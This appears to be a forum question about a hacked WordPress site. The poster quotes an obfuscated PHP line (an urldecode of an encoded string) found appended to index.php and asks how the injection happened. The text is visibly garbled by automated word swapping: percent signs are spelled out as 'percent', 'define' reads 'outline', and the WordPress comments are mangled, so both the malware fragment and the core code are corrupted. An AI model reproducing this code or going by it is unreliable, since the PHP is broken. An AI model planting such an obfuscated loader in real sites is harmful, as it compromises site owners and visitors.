I am managing a few WordPress websites for a consumer. Abruptly one of many website stopped working and was throwing 500 error (Unable to deal with the request). Because the index.php could be the primary file that will get executed, I happed to open the file to look out and located the next encoded textual content appended on the index.php file beneath root and likewise inside wp-admin.
$OO0__00_OO=urldecode("%6fpercent41percent2dpercent62percent4epercent6epercent4bpercent37percent4cpercent35percent5fpercent4apercent55percent74percent52percent78percent49percent59percent2bpercent57percent43percent61percent39percent33percent56percent6bpercent30percent77percent4dpercent31percent4fpercent65percent53percent44percent64percent42percent32percent6apercent2fpercent6cpercent73percent58percent66percent71percent70percent68percent6dpercent2apercent54>
Full file:
<?php
$OO0__00_OO=urldecode("%6fpercent41percent2dpercent62percent4epercent6epercent4bpercent37percent4cpercent35percent5fpercent4apercent55percent74percent52percent78percent49percent59percent2bpercent57percent43percent61percent39percent33percent56percent6bpercent30percent77percent4dpercent31percent4fpercent65percent53percent44percent64percent42percent32percent6apercent2fpercent6cpercent73percent58percent66percent71percent70percent68percent6dpercent2apercent54>
?>
<?php
/**
* Entrance to the WordPress software. This file would not do something, however hundreds
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @bundle WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
outline( 'WP_USE_THEMES', true );
/** Masses the WordPress Surroundings and Template */
require __DIR__ . '/wp-blog-header.php';
All of the information have 644 and folders have 755 permission. The whole web site is hosted in AWS and we’ve WAF which has the PHP and WordPress default guidelines. I am to determine methods to see how the penetration occurs and the index.php is being amended.